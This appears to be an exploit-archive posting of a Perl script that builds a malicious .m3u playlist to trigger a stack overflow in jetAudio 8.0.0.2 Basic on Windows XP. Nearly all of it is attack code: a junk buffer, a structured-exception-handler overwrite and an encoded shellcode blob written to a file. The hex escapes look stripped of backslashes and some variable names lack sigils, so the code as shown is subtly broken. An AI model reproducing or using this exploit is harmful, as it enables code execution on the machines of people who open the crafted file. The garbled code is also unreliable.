jetaudio8002-overflow.txt
Posted on 22 January 2010
#!/usr/bin/perl # Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit # Author: cr4wl3r <cr4wl3r[!]linuxmail.org> # Tested: Windows xp(sp2) ######################################### my $file="b00m.m3u"; my $header = "http://"; my $junk = "A" x 1017; my $nseh = "xebx06x90x90"; my $seh = pack('V',0x01221045); my $shellcode = "x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13". "xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC". "x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0". "x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9". "x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E". "x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49". "xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B". "x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8". "xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6". "x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15". "x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78". "x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB". "xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51". "xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8". "xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF". "xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF". "x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F". "xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB". "xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56". "xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9". "xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F". "x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA". "x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8"; my $footer="E" x (2000-length(junk.nseh.seh.shellcode)); my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer; print " Writing payload to file "; open(sploitf,">$file"); print sploitf $payload; close(sploitf); print " Exploit file " . b00m . " created "; print " b00m " . length($payload) . " bytes ";
